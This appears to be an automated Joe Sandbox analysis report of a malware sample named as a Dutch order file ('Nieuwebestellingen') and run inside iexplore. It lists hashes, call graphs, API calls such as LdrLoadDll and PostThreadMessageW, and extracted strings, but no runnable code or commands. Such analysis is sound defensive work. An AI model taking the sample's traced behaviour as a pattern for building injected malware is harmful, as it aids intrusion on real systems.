                                                                                                                                                                              • Opcode ID: da8873c060e873873dd48afe80135daa4a299d3a97b79364ff028f954abf6b65
                                                                                                                                                                              • Instruction ID: b4605cc3beb89cd266a7f466896fdaf3436f377f917f5e14f40d195d38a69af1
                                                                                                                                                                              • Opcode Fuzzy Hash: da8873c060e873873dd48afe80135daa4a299d3a97b79364ff028f954abf6b65
                                                                                                                                                                              • Instruction Fuzzy Hash: A331A63190D7888FD729DFA8D846BEABBE0EF56321F0442AED089C3193DB64A445CB51
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000000.00000002.2167284543.00007FF847260000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF847260000, based on PE: false
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_0_2_7ff847260000_Nieuwebestellingen10122024.jbxd
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID:
                                                                                                                                                                              • String ID:
                                                                                                                                                                              • API String ID:
                                                                                                                                                                              • Opcode ID: 9739b940ef7ccf677f3509e2a8eebc6c24af2996e6f7d659c594e7e43b0f9457
                                                                                                                                                                              • Instruction ID: a73705789d68d7bb11ef7298e871e40cc08b1305d17c02f5b077a3c2e2ac60a5
                                                                                                                                                                              • Opcode Fuzzy Hash: 9739b940ef7ccf677f3509e2a8eebc6c24af2996e6f7d659c594e7e43b0f9457
                                                                                                                                                                              • Instruction Fuzzy Hash: BC71023190DA998FDB56EB2888655B87BE0EF56341B0901FBC04BD71A7DE28BC46C781
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000000.00000002.2167284543.00007FF847260000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF847260000, based on PE: false
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_0_2_7ff847260000_Nieuwebestellingen10122024.jbxd
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID:
                                                                                                                                                                              • String ID:
                                                                                                                                                                              • API String ID:
                                                                                                                                                                              • Opcode ID: d8d1f9b442d2fd780749b71b539c3b0f2834ec3c12973f7146369d2473291bc0
                                                                                                                                                                              • Instruction ID: 61e0a965f387c595902a1012f6734a490421d851e1843979c2d5a62da989ed68
                                                                                                                                                                              • Opcode Fuzzy Hash: d8d1f9b442d2fd780749b71b539c3b0f2834ec3c12973f7146369d2473291bc0
                                                                                                                                                                              • Instruction Fuzzy Hash: A1415912E4DBCA8FE7A7A63818645B87BE1DF56251B1C05FBC08AC71D3EC085C429311
                                                                                                                                                                              Strings
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000000.00000002.2166600581.00007FF847150000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF847150000, based on PE: false
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_0_2_7ff847150000_Nieuwebestellingen10122024.jbxd
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID:
                                                                                                                                                                              • String ID: XQ"G
                                                                                                                                                                              • API String ID: 0-227094213
                                                                                                                                                                              • Opcode ID: 3cbfb10b0b34dba12281e525f0e2cd27636920179d627b010b07cbe6b6dabdcf
                                                                                                                                                                              • Instruction ID: 878c860d9be0bf91a258e60f71a97cd9efdb2d1fdff20b982cbb3af6aef94a81
                                                                                                                                                                              • Opcode Fuzzy Hash: 3cbfb10b0b34dba12281e525f0e2cd27636920179d627b010b07cbe6b6dabdcf
                                                                                                                                                                              • Instruction Fuzzy Hash: 5D522631A0CA4A8FE758EB2CE44567AB7E1FF85350F1441BAD44EC7296DA25AC43CB81
                                                                                                                                                                              Strings
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000000.00000002.2166600581.00007FF847150000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF847150000, based on PE: false
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_0_2_7ff847150000_Nieuwebestellingen10122024.jbxd
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID:
                                                                                                                                                                              • String ID: wL_
                                                                                                                                                                              • API String ID: 0-3720076477
                                                                                                                                                                              • Opcode ID: 6538f81262378bc5a2093c1062228b75be4fd5908c833869eeda9860ddd85206
                                                                                                                                                                              • Instruction ID: 35360723cbb3726ebc68845af2c9b4dff842d9e372ab5ad1495a1fc61fc3bb95
                                                                                                                                                                              • Opcode Fuzzy Hash: 6538f81262378bc5a2093c1062228b75be4fd5908c833869eeda9860ddd85206
                                                                                                                                                                              • Instruction Fuzzy Hash: 4EF15423A0C1669AE7107EBDB44A0FD7B50DF817F6B094177D28D8A0C7DE18A48E8BD5
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000000.00000002.2166600581.00007FF847150000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF847150000, based on PE: false
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_0_2_7ff847150000_Nieuwebestellingen10122024.jbxd
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID:
                                                                                                                                                                              • String ID:
                                                                                                                                                                              • API String ID:
                                                                                                                                                                              • Opcode ID: 33933989db45ca9f6011c07dae69a90ae2f1583d348441c98419482d80f72dde
                                                                                                                                                                              • Instruction ID: 74b063e02508c352ca6d8a23f3861bb986a6881acc9cbc4be1b6fd16907a7b1f
                                                                                                                                                                              • Opcode Fuzzy Hash: 33933989db45ca9f6011c07dae69a90ae2f1583d348441c98419482d80f72dde
                                                                                                                                                                              • Instruction Fuzzy Hash: BA71291BB0D6A1AAD3117A7DB8051E97F50EFC27B670904B7D288CF087D5146C8E8BE0

                                                                                                                                                                              Execution Graph

                                                                                                                                                                              Execution Coverage:1.4%
                                                                                                                                                                              Dynamic/Decrypted Code Coverage:0%
                                                                                                                                                                              Signature Coverage:9%
                                                                                                                                                                              Total number of Nodes:122
                                                                                                                                                                              Total number of Limit Nodes:7
                                                                                                                                                                              execution_graph 75981 42ed63 75984 42ceb3 75981->75984 75983 42ed7e 75985 42cecd 75984->75985 75986 42cede RtlAllocateHeap 75985->75986 75986->75983 75987 4251a3 75990 4251bc 75987->75990 75988 42524c 75989 425204 75995 42ec83 75989->75995 75990->75988 75990->75989 75993 425247 75990->75993 75994 42ec83 RtlFreeHeap 75993->75994 75994->75988 75998 42cf03 75995->75998 75997 425214 75999 42cf1d 75998->75999 76000 42cf2e RtlFreeHeap 75999->76000 76000->75997 76105 42c153 76106 42c170 76105->76106 76109 32c2df0 LdrInitializeThunk 76106->76109 76107 42c198 76109->76107 76110 424e13 76111 424e2f 76110->76111 76112 424e57 76111->76112 76113 424e6b 76111->76113 76114 42cb93 NtClose 76112->76114 76115 42cb93 NtClose 76113->76115 76116 424e60 76114->76116 76117 424e74 76115->76117 76120 42eda3 RtlAllocateHeap 76117->76120 76119 424e7f 76120->76119 76001 41a963 76002 41a97b 76001->76002 76004 41a9d5 76001->76004 76002->76004 76005 41e8e3 76002->76005 76006 41e909 76005->76006 76008 41e99e 76006->76008 76009 42fdc3 RtlAllocateHeap RtlFreeHeap 76006->76009 76008->76004 76009->76008 76010 41b6c3 76011 41b707 76010->76011 76013 41b728 76011->76013 76014 42cb93 76011->76014 76015 42cbb0 76014->76015 76016 42cbc1 NtClose 76015->76016 76016->76013 76017 4140e3 76018 414109 76017->76018 76019 414133 76018->76019 76021 4141fb 76018->76021 76022 413e63 76018->76022 76025 42ce23 76022->76025 76026 42ce40 76025->76026 76029 32c2c70 LdrInitializeThunk 76026->76029 76027 413e85 76027->76021 76029->76027 76030 401ca2 76031 401cc7 76030->76031 76034 4301f3 76031->76034 76037 42e833 76034->76037 76038 42e859 76037->76038 76049 4075f3 76038->76049 76040 42e86f 76041 401d8d 76040->76041 76052 41b4d3 76040->76052 76043 42e88e 76044 42e8a3 76043->76044 76067 42cf53 76043->76067 76063 4286e3 76044->76063 76047 42e8bd 76048 42cf53 ExitProcess 76047->76048 76048->76041 76070 416863 76049->76070 76051 407600 76051->76040 76053 41b4ff 76052->76053 76079 41b3c3 76053->76079 76056 41b544 76058 41b560 76056->76058 76061 42cb93 NtClose 76056->76061 76057 41b52c 76059 41b537 76057->76059 76060 42cb93 NtClose 76057->76060 76058->76043 76059->76043 76060->76059 76062 41b556 76061->76062 76062->76043 76064 428745 76063->76064 76066 428752 76064->76066 76090 418a03 76064->76090 76066->76047 76068 42cf70 76067->76068 76069 42cf81 ExitProcess 76068->76069 76069->76044 76071 416880 76070->76071 76073 416899 76071->76073 76074 42d5f3 76071->76074 76073->76051 76076 42d60d 76074->76076 76075 42d63c 76075->76073 76076->76075 76077 42ec83 RtlFreeHeap 76076->76077 76078 42d6b5 76077->76078 76078->76073 76080 41b4b9 76079->76080 76081 41b3dd 76079->76081 76080->76056 76080->76057 76085 42c243 76081->76085 76084 42cb93 NtClose 76084->76080 76086 42c25d 76085->76086 76089 32c35c0 LdrInitializeThunk 76086->76089 76087 41b4ad 76087->76084 76089->76087 76092 418a2d 76090->76092 76091 418f3b 76091->76066 76092->76091 76098 414043 76092->76098 76094 418b5a 76094->76091 76095 42ec83 RtlFreeHeap 76094->76095 76096 418b72 76095->76096 76096->76091 76097 42cf53 ExitProcess 76096->76097 76097->76091 76099 414063 76098->76099 76101 4140cc 76099->76101 76103 41b7e3 RtlFreeHeap 76099->76103 76101->76094 76102 4140c2 76102->76094 76103->76102 76121 4143d3 76122 4143ed 76121->76122 76127 417ba3 76122->76127 76124 41440b 76125 414450 76124->76125 76126 41443f PostThreadMessageW 76124->76126 76126->76125 76128 417bc7 76127->76128 76129 417c03 LdrLoadDll 76128->76129 76130 417bce 76128->76130 76129->76130 76130->76124 76131 419158 76132 41915d 76131->76132 76133 42cb93 NtClose 76132->76133 76134 419162 76133->76134 76104 32c2b60 LdrInitializeThunk

                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                              • Executed
                                                                                                                                                                              • Not Executed
                                                                                                                                                                              control_flow_graph 187 417ba3-417bcc call 42f863 190 417bd2-417be0 call 42fe63 187->190 191 417bce-417bd1 187->191 194 417bf0-417c01 call 42e303 190->194 195 417be2-417bed call 430103 190->195 200 417c03-417c17 LdrLoadDll 194->200 201 417c1a-417c1d 194->201 195->194 200->201
                                                                                                                                                                              APIs
                                                                                                                                                                              • LdrLoadDll.NTDLL(00000000,00000000,?,?), ref: 00417C15
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000005.00000002.2328130427.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_5_2_400000_iexplore.jbxd
                                                                                                                                                                              Yara matches
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: Load
                                                                                                                                                                              • String ID:
                                                                                                                                                                              • API String ID: 2234796835-0
                                                                                                                                                                              • Opcode ID: 949b144e7e312fa6565cca895f987050310427acaaecf67f35788da544e7e580
                                                                                                                                                                              • Instruction ID: 29541c4c1cb86a97046c076e925ce7a07987024d856869177c45976850981732
                                                                                                                                                                              • Opcode Fuzzy Hash: 949b144e7e312fa6565cca895f987050310427acaaecf67f35788da544e7e580
                                                                                                                                                                              • Instruction Fuzzy Hash: 9A0125B5E0410DABDF10DBE5DC42FDEB3789B54308F0041A6E91897241F635EB588795

                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                              • Executed
                                                                                                                                                                              • Not Executed
                                                                                                                                                                              control_flow_graph 212 42cb93-42cbcf call 404923 call 42ddf3 NtClose
                                                                                                                                                                              APIs
                                                                                                                                                                              • NtClose.NTDLL(?,?,00000000,00000000,0000001F,?,FA0A1F00), ref: 0042CBCA
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000005.00000002.2328130427.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_5_2_400000_iexplore.jbxd
                                                                                                                                                                              Yara matches
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: Close
                                                                                                                                                                              • String ID:
                                                                                                                                                                              • API String ID: 3535843008-0
                                                                                                                                                                              • Opcode ID: 28e2915287915a0d41cf43200706cdba27b30fd896c2b55e5b9696efd4849daf
                                                                                                                                                                              • Instruction ID: b76cf9a5bfc1315908a28204a52b0b2c49534136212ae28f732410f805bb8f60
                                                                                                                                                                              • Opcode Fuzzy Hash: 28e2915287915a0d41cf43200706cdba27b30fd896c2b55e5b9696efd4849daf
                                                                                                                                                                              • Instruction Fuzzy Hash: 91E04F762412547BD620AA6AEC41F9B776DDBC5714F404429FA0967141CAB4790187A4
                                                                                                                                                                              APIs
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000005.00000002.2333103481.0000000003250000.00000040.00001000.00020000.00000000.sdmp, Offset: 03250000, based on PE: true
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_5_2_3250000_iexplore.jbxd
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: InitializeThunk
                                                                                                                                                                              • String ID:
                                                                                                                                                                              • API String ID: 2994545307-0
                                                                                                                                                                              • Opcode ID: 4414f32281f17e0c3068023cf6df64479c187941f5dbc85ad3038cafab1316b6
                                                                                                                                                                              • Instruction ID: 9b3481a6262576aa0bfe2326a1dcfe5fc1e7ac002d854d45d7f07c44bf944490
                                                                                                                                                                              • Opcode Fuzzy Hash: 4414f32281f17e0c3068023cf6df64479c187941f5dbc85ad3038cafab1316b6
                                                                                                                                                                              • Instruction Fuzzy Hash: E690023561551802D100B1584514706101587D0201F65C411A1424568D87958A9165A2

                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                              • Executed
                                                                                                                                                                              • Not Executed
                                                                                                                                                                              control_flow_graph 367 32c2b60-32c2b6c LdrInitializeThunk
                                                                                                                                                                              APIs
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000005.00000002.2333103481.0000000003250000.00000040.00001000.00020000.00000000.sdmp, Offset: 03250000, based on PE: true
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_5_2_3250000_iexplore.jbxd
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: InitializeThunk
                                                                                                                                                                              • String ID:
                                                                                                                                                                              • API String ID: 2994545307-0
                                                                                                                                                                              • Opcode ID: be32dfa56d30c3f420fd89ec5cc1aeedab87014bef5d2ad5ca23fe37e367ef13
                                                                                                                                                                              • Instruction ID: 477e9216d6550ec3bb175b241ac2674decda09c0969ea79c40f84ee749e69e0d
                                                                                                                                                                              • Opcode Fuzzy Hash: be32dfa56d30c3f420fd89ec5cc1aeedab87014bef5d2ad5ca23fe37e367ef13
                                                                                                                                                                              • Instruction Fuzzy Hash: 4D900265212414034105B1584414616401A87E0201B55C021E2014590DC62589D16125

                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                              • Executed
                                                                                                                                                                              • Not Executed
                                                                                                                                                                              control_flow_graph 369 32c2df0-32c2dfc LdrInitializeThunk
                                                                                                                                                                              APIs
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000005.00000002.2333103481.0000000003250000.00000040.00001000.00020000.00000000.sdmp, Offset: 03250000, based on PE: true
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_5_2_3250000_iexplore.jbxd
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: InitializeThunk
                                                                                                                                                                              • String ID:
                                                                                                                                                                              • API String ID: 2994545307-0
                                                                                                                                                                              • Opcode ID: 488a5a47aeb77e117abc9f97850403e292b4e7ede5a821476d0f2606d6b9a57d
                                                                                                                                                                              • Instruction ID: 64b40e384864c032cb6f457643331570379c66d6232a1bf80c70441574f871e9
                                                                                                                                                                              • Opcode Fuzzy Hash: 488a5a47aeb77e117abc9f97850403e292b4e7ede5a821476d0f2606d6b9a57d
                                                                                                                                                                              • Instruction Fuzzy Hash: B890023521141813D111B1584504707001987D0241F95C412A1424558D97568A92A121

                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                              • Executed
                                                                                                                                                                              • Not Executed
                                                                                                                                                                              control_flow_graph 368 32c2c70-32c2c7c LdrInitializeThunk
                                                                                                                                                                              APIs
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000005.00000002.2333103481.0000000003250000.00000040.00001000.00020000.00000000.sdmp, Offset: 03250000, based on PE: true
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_5_2_3250000_iexplore.jbxd
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: InitializeThunk
                                                                                                                                                                              • String ID:
                                                                                                                                                                              • API String ID: 2994545307-0
                                                                                                                                                                              • Opcode ID: a6ffbd81d2ed850a923c1f34e5a906787be592316325b3cc7196e07b40670a0d
                                                                                                                                                                              • Instruction ID: 65561b1897da6c2b74b43fbd829d9eda5e2cb63ba1e6752c2b3ab3e17f3a5831
                                                                                                                                                                              • Opcode Fuzzy Hash: a6ffbd81d2ed850a923c1f34e5a906787be592316325b3cc7196e07b40670a0d
                                                                                                                                                                              • Instruction Fuzzy Hash: 1A90023521149C02D110B158840474A001587D0301F59C411A5424658D879589D17121

                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                              • Executed
                                                                                                                                                                              • Not Executed
                                                                                                                                                                              control_flow_graph 0 4143ac-4143ae 1 4143b0-4143bc 0->1 2 414429-41443d 0->2 3 414373-414390 1->3 4 4143be-4143ca 1->4 5 41445d-414463 2->5 6 41443f-41444e PostThreadMessageW 2->6 3->0 6->5 7 414450-41445a 6->7 7->5
                                                                                                                                                                              APIs
                                                                                                                                                                              • PostThreadMessageW.USER32(2361o4QI,00000111,00000000,00000000), ref: 0041444A
                                                                                                                                                                              Strings
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000005.00000002.2328130427.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_5_2_400000_iexplore.jbxd
                                                                                                                                                                              Yara matches
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: MessagePostThread
                                                                                                                                                                              • String ID: 2361o4QI$2361o4QI
                                                                                                                                                                              • API String ID: 1836367815-3806180685
                                                                                                                                                                              • Opcode ID: e2d99c1290c8e791b22f7134dbcd5559d0a492aa6781d34470d3428f2b1c55b5
                                                                                                                                                                              • Instruction ID: 5114dfc27e37c2844b5d0d952bbf8d8a230acc9a7d7e3ddd19e2c65ec9fb8e41
                                                                                                                                                                              • Opcode Fuzzy Hash: e2d99c1290c8e791b22f7134dbcd5559d0a492aa6781d34470d3428f2b1c55b5
                                                                                                                                                                              • Instruction Fuzzy Hash: D30170337442697ADB1655E82C928FAF7DDDFC3365704816EEA95C7252C3154C038395

                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                              APIs
                                                                                                                                                                              • PostThreadMessageW.USER32(2361o4QI,00000111,00000000,00000000), ref: 0041444A
                                                                                                                                                                              Strings
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000005.00000002.2328130427.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_5_2_400000_iexplore.jbxd
                                                                                                                                                                              Yara matches
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: MessagePostThread
                                                                                                                                                                              • String ID: 2361o4QI$2361o4QI
                                                                                                                                                                              • API String ID: 1836367815-3806180685
                                                                                                                                                                              • Opcode ID: bdaeac2891d156e517c70cce5b2a1b228c92b2475f2606c63c77cf88c13d6fd5
                                                                                                                                                                              • Instruction ID: f6bc12b4a7e54384fc08b28754581a0646dab71cd1bb19be4be7fabdc026553b
                                                                                                                                                                              • Opcode Fuzzy Hash: bdaeac2891d156e517c70cce5b2a1b228c92b2475f2606c63c77cf88c13d6fd5
                                                                                                                                                                              • Instruction Fuzzy Hash: 9F1129B1D0025C7AEB11AAE19C81DEFBB7C9F41358F448069FA44B7101D5785E068BA5

                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                              APIs
                                                                                                                                                                              • PostThreadMessageW.USER32(2361o4QI,00000111,00000000,00000000), ref: 0041444A
                                                                                                                                                                              Strings
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000005.00000002.2328130427.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_5_2_400000_iexplore.jbxd
                                                                                                                                                                              Yara matches
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: MessagePostThread
                                                                                                                                                                              • String ID: 2361o4QI$2361o4QI
                                                                                                                                                                              • API String ID: 1836367815-3806180685
                                                                                                                                                                              • Opcode ID: 05357d2f48808b187999a6c1e57de2fcecde43931fb71b34567b6fbaf915147e
                                                                                                                                                                              • Instruction ID: 530b1707573153fa9b7f38926838a4d04c1a85311558d4362bc03077739b09d9
                                                                                                                                                                              • Opcode Fuzzy Hash: 05357d2f48808b187999a6c1e57de2fcecde43931fb71b34567b6fbaf915147e
                                                                                                                                                                              • Instruction Fuzzy Hash: 8701DBB1D0011C7AEB10AAE19C81DEF7B7CDF41798F448069FA14B7241D5785E068BB5

                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                              • Executed
                                                                                                                                                                              • Not Executed
                                                                                                                                                                              control_flow_graph 202 42ceb3-42cef4 call 404923 call 42ddf3 RtlAllocateHeap
                                                                                                                                                                              APIs
                                                                                                                                                                              • RtlAllocateHeap.NTDLL(?,0041E99E,?,?,00000000,?,0041E99E,?,?,?), ref: 0042CEEF
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000005.00000002.2328130427.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_5_2_400000_iexplore.jbxd
                                                                                                                                                                              Yara matches
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: AllocateHeap
                                                                                                                                                                              • String ID:
                                                                                                                                                                              • API String ID: 1279760036-0
                                                                                                                                                                              • Opcode ID: 311047913c47a87db36be3ff7f68d10f10ca09af2a13ea7d97f05a6941379270
                                                                                                                                                                              • Instruction ID: 30e79609f481ea63e4db638f7a1dac92b35ebc6749900525827dc58393b69420
                                                                                                                                                                              • Opcode Fuzzy Hash: 311047913c47a87db36be3ff7f68d10f10ca09af2a13ea7d97f05a6941379270
                                                                                                                                                                              • Instruction Fuzzy Hash: 83E092B6204214BFD614EE69EC41FEF37ADEFC9710F404029F909A7241CA74B9108BB8

                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                              • Executed
                                                                                                                                                                              • Not Executed
                                                                                                                                                                              control_flow_graph 207 42cf03-42cf44 call 404923 call 42ddf3 RtlFreeHeap
                                                                                                                                                                              APIs
                                                                                                                                                                              • RtlFreeHeap.NTDLL(00000000,00000004,00000000,4D8B4674,00000007,00000000,00000004,00000000,0041742C,000000F4), ref: 0042CF3F
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000005.00000002.2328130427.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_5_2_400000_iexplore.jbxd
                                                                                                                                                                              Yara matches
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: FreeHeap
                                                                                                                                                                              • String ID:
                                                                                                                                                                              • API String ID: 3298025750-0
                                                                                                                                                                              • Opcode ID: 0a10d6433b35e32f4ef85d94afe1d23d7cf17eb97beecc91f61264520daa96a1
                                                                                                                                                                              • Instruction ID: 93d52155cd82351b0253c774491d9607e7b819bc1e9d4196672af213d8618792
                                                                                                                                                                              • Opcode Fuzzy Hash: 0a10d6433b35e32f4ef85d94afe1d23d7cf17eb97beecc91f61264520daa96a1
                                                                                                                                                                              • Instruction Fuzzy Hash: C2E06DB6204204BBC614EE59DC45EDB73ACEFC9714F004019FA08A7242DA74B91087B4

                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                              • Executed
                                                                                                                                                                              • Not Executed
                                                                                                                                                                              control_flow_graph 217 42cf53-42cf8f call 404923 call 42ddf3 ExitProcess
                                                                                                                                                                              APIs
                                                                                                                                                                              • ExitProcess.KERNEL32(?,00000000,00000000,?,40B9B70A,?,?,40B9B70A), ref: 0042CF8A
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000005.00000002.2328130427.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_5_2_400000_iexplore.jbxd
                                                                                                                                                                              Yara matches
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: ExitProcess
                                                                                                                                                                              • String ID:
                                                                                                                                                                              • API String ID: 621844428-0
                                                                                                                                                                              • Opcode ID: 93c9f9102f68108a7200f743b159bea482fc89f88471024d8a2ed1e98eb2cdd2
                                                                                                                                                                              • Instruction ID: 5a3f9d1a4c76ec654bf4906ff3ec58e68c58e48e86c582a1c5830d33f06476cf
                                                                                                                                                                              • Opcode Fuzzy Hash: 93c9f9102f68108a7200f743b159bea482fc89f88471024d8a2ed1e98eb2cdd2
                                                                                                                                                                              • Instruction Fuzzy Hash: 81E04676240614BBD620AB6AEC41FEB776DEBC5710F00412AFA08A7241CAB9B91086E4
                                                                                                                                                                              Strings
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000005.00000002.2333103481.0000000003250000.00000040.00001000.00020000.00000000.sdmp, Offset: 03250000, based on PE: true
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_5_2_3250000_iexplore.jbxd
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID:
                                                                                                                                                                              • String ID: @$@$CFGOptions$DisableExceptionChainValidation$DisableHeapLookaside$ExecuteOptions$FrontEndHeapDebugOptions$GlobalFlag$GlobalFlag2$Initializing the application verifier package failed with status 0x%08lx$LdrpInitializeExecutionOptions$MaxDeadActivationContexts$MaxLoaderThreads$MinimumStackCommitInBytes$RaiseExceptionOnPossibleDeadlock$ShutdownFlags$TracingFlags$UnloadEventTraceDepth$UseImpersonatedDeviceMap$minkernel\ntdll\ldrinit.c
                                                                                                                                                                              • API String ID: 0-2160512332
                                                                                                                                                                              • Opcode ID: 78802bde12a0cb8463c95dc0efd549b2033f8c72dc9d04128b2883f93d331630
                                                                                                                                                                              • Instruction ID: d457f6a2d8b4c73cf402f4bd2a5f4091d7145f23a8ed59feb134a7378e3984dc
                                                                                                                                                                              • Opcode Fuzzy Hash: 78802bde12a0cb8463c95dc0efd549b2033f8c72dc9d04128b2883f93d331630
                                                                                                                                                                              • Instruction Fuzzy Hash: 99929A75614741AFE721DE24CC94B6BB7E8BB88750F084D2DFA94DB290D770E884CB92
                                                                                                                                                                              Strings
                                                                                                                                                                              • Address of the debug info found in the active list., xrefs: 032F54AE, 032F54FA
                                                                                                                                                                              • Thread identifier, xrefs: 032F553A
                                                                                                                                                                              • Critical section debug info address, xrefs: 032F541F, 032F552E
                                                                                                                                                                              • undeleted critical section in freed memory, xrefs: 032F542B
                                                                                                                                                                              • Invalid debug info address of this critical section, xrefs: 032F54B6
                                                                                                                                                                              • Second initialization stack trace. Use dps to dump it if non-NULL., xrefs: 032F54CE
                                                                                                                                                                              • Critical section address., xrefs: 032F5502
                                                                                                                                                                              • Initialization stack trace. Use dps to dump it if non-NULL., xrefs: 032F540A, 032F5496, 032F5519
                                                                                                                                                                              • Critical section address, xrefs: 032F5425, 032F54BC, 032F5534
                                                                                                                                                                              • double initialized or corrupted critical section, xrefs: 032F5508
                                                                                                                                                                              • 8, xrefs: 032F52E3
                                                                                                                                                                              • First initialization stack trace. Use dps to dump it if non-NULL., xrefs: 032F54E2
                                                                                                                                                                              • Thread is in a state in which it cannot own a critical section, xrefs: 032F5543
                                                                                                                                                                              • corrupted critical section, xrefs: 032F54C2
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000005.00000002.2333103481.0000000003250000.00000040.00001000.00020000.00000000.sdmp, Offset: 03250000, based on PE: true
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_5_2_3250000_iexplore.jbxd
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID:
                                                                                                                                                                              • String ID: 8$Address of the debug info found in the active list.$Critical section address$Critical section address.$Critical section debug info address$First initialization stack trace. Use dps to dump it if non-NULL.$Initialization stack trace. Use dps to dump it if non-NULL.$Invalid debug info address of this critical section$Second initialization stack trace. Use dps to dump it if non-NULL.$Thread identifier$Thread is in a state in which it cannot own a critical section$corrupted critical section$double initialized or corrupted critical section$undeleted critical section in freed memory
                                                                                                                                                                              • API String ID: 0-2368682639
                                                                                                                                                                              • Opcode ID: 25af31cbd47ff95376e41f9a602d52271d3dea7c4e9e59e871cdd56f59b35b90
